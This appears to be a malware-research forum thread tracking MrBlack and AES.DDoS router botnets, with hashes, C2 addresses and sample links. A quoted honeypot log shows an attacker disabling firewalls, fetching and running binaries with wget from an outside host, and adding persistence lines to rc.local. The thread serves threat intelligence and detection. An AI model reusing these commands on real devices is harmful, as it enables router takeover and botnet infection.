[unixfreaxjp]

Nice combination of Mr.Black & AES.DDoS in one panel.. :)

Report:

Code: Select all

// 　Name             Hashes                              MalwareName & Arch
    1. (2O16I1)    = c86fe64d074a7255968504be5aca8102 // mrblack.ddos ARM
    2. (312vt)     = 0005983da39751deb80264b10f7e16b0 // AES.DDoS ARM
    3. (scaqq)     = 60b25f9c03eca8dee74649d2f0ce3cf0 // AES.ddos ARM
// Files:
   2O16I1:   unpacked, ELF 32-bit LSB executable, ARM, EABI4 (SYSV), static, stripped
   312vt:     packed, ELF 32-bit LSB executable, ARM, EABI5 (GNU/Linux), static, stripped
   scaqq:     packed, ELF 32-bit LSB executable, ARM, EABI5 (GNU/Linux), static, stripped

cnc: 222.186.34.220 attacker: 60.166.61.110

[unixfreaxjp]

Mr.Black in action ) Panic, hang & had to SIGKILL'ed in the middle of action :lol:

I guess they miss "something" again..lol - never use/heard of "slackware" in crookland?
https://www.virustotal.com/en/file/db89 ... 443220303/
this sample is same as above post the 206*** one, it was re-attacking yesterday.

[unixfreaxjp]

This is AES.DDoS router (ARM) version, NOT MrBlack < pls noted this although the route of codes for both malware are the same.
Attacker/panel: 59.56.110.233:8081
CNC (IP basis) 59.56.110.233 port 48080
CNC is open PoC:

Code: Select all

Thu Oct 15 06:39:21 JST 2015
233.110.56.59.in-addr.arpa [59.56.110.233] 48080 (http) open
Connection to 59.56.110.233 48080 port [tcp/48080] succeeded! 

Sample: https://www.virustotal.com/en/file/d0cc ... 444858548/

[unixfreaxjp]

Mr.Black on MIPS x32/r3000 series arch routers
https://www.virustotal.com/en/file/1396 ... 444864491/

Code: Select all

Attacker & panel;: 1.93.19.203(panel port:6969)
CNC is ip address: 1.93.19.203 : 7878 / AS4808 CNCGROUP China169 Beijing

#MalwareMUSTDie!!

[unixfreaxjp]

Double panel same payloads at 123.249.29.244 and 115.230.124.153 w/ ssh attacker from 115.230.124.153

CNC is 123.249.29.244:11024

Code: Select all

Int Server...
connect to server...
---server 123.249.29.244:11024---
---server 123.249.29.244:11024 (4095605115:4139)---
(UNKNOWN) [123.249.29.244] 11024 (?) open
Connection to 123.249.29.244 11024 port [tcp/*] succeeded!
READAS.MMD-KICKASS-SCUM.ORG TCP ->123.249.29.244:11024 (ESTABLISHED)

https://www.virustotal.com/en/file/e1ea ... 444947243/

[unixfreaxjp]

This is AES.DDoSer, for ARM and intel
https://www.virustotal.com/en/file/5c56 ... 445306739/
https://www.virustotal.com/en/file/58f7 ... 445306725/
attack log:

Code: Select all

2015-10-20 10:12:28 sess/ip=2953,58.221.60.138] Remote SSH version: SSH-2.0-libssh2_1.4.3
2015-10-20 10:12:28 sess/ip=2953,58.221.60.138] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2015-10-20 10:12:28 sess/ip=2953,58.221.60.138] outgoing: aes128-ctr hmac-sha1 none
2015-10-20 10:12:28 sess/ip=2953,58.221.60.138] incoming: aes128-ctr hmac-sha1 none
2015-10-20 10:12:29 sess/ip=2953,58.221.60.138] login attempt [admin/admin] succeeded
2015-10-20 10:12:33 sess/ip=2953,58.221.60.138] SHELL: /etc/init.d/iptables stop
2015-10-20 10:12:37 sess/ip=2953,58.221.60.138] SHELL: service iptables stop
2015-10-20 10:12:41 sess/ip=2953,58.221.60.138] SHELL: SuSEfirewall2 stop
2015-10-20 10:12:45 sess/ip=2953,58.221.60.138] SHELL: reSuSEfirewall2 stop
2015-10-20 10:12:49 sess/ip=2953,58.221.60.138] SHELL: cd /tmp
2015-10-20 10:12:53 sess/ip=2953,58.221.60.138] SHELL: wget -c http://58.221.60.138:50000/linux-arm
2015-10-20 10:12:57 sess/ip=2953,58.221.60.138] SHELL: chmod 777 linux-arm
2015-10-20 10:13:02 sess/ip=2953,58.221.60.138] SHELL: ./linux-arm &
2015-10-20 10:13:05 sess/ip=2953,58.221.60.138] SHELL: wget -c http://58.221.60.138:50000/Linux2.6
2015-10-20 10:13:19 sess/ip=2953,58.221.60.138] SHELL: chmod 777 Linux2.6
2015-10-20 10:13:19 sess/ip=2953,58.221.60.138] SHELL: ./Linux2.6 &
2015-10-20 10:13:19 sess/ip=2953,58.221.60.138] SHELL: echo "cd /tmp/">>/etc/rc.local
2015-10-20 10:13:26 sess/ip=2953,58.221.60.138] SHELL: echo "/etc/init.d/iptables stop">>/etc/rc.local

CNC checks, both are on same IP and ports as per attacker and its panel..

Code: Select all

linux-arm: ELF 32-bit LSB executable, ARM, version 1 (GNU/Linux), statically linked, stripped
538c8a700e6299258380b9d7eff4ee31 linux-arm
open temporary file /etc/sede1dRLk
open temporary file /etc/sednbbFbg
read /etc/rc.d/rc.local
read /etc/init.d/boot.local
Connecting to 58.221.60.138 50050 port ..
(UNKNOWN) 58.221.60.138 50050 (?) open
Connection to 58.221.60.138 50050 port succeeded!
TCP MMD-KICKS-AESDDOS->58.221.60.138:50050 (ESTABLISHED)
VERSONEX:MMD-KICKS-AESDDOS|0|0 MHz|XXXMB|XXXMB|Hacker
INFO:0.5%|0.0XX Mbps
INFO:0.6%|0.0XX Mbps

infection pace is high..

#MalwareMustDie!!

[shibumi]

I've attached further Linux/Mrblack samples

[unixfreaxjp]

Memo:
AES.DDoS attack switch latest version (case switch 0x01 to 0x0C)

Typical MO:

Code: Select all

/etc/sed[a-zA-Z0-9]{5}
/etc/rc.d/rc.local
/etc/init.d/boot.local

Network:

Code: Select all

CNC: 115.231.219.147:48080 (ip base) AS4134 ChinaNet-ZJ Shaoxing
PNL: 222.186.26.121:443 (hacked victim) AS23650 ChinaNet Jiangsu

Note:

Do make sig from this sample, and your product can detect all of the AES.DDoS varients correctly w/o mixing with MrBlack.

Reversing some flood techniques is good to mitigate them like this.

#MalwareMustDie

[unixfreaxjp]

AES.DDoS windows version.
VT: https://www.virustotal.com/en/file/d828 ... 460972767/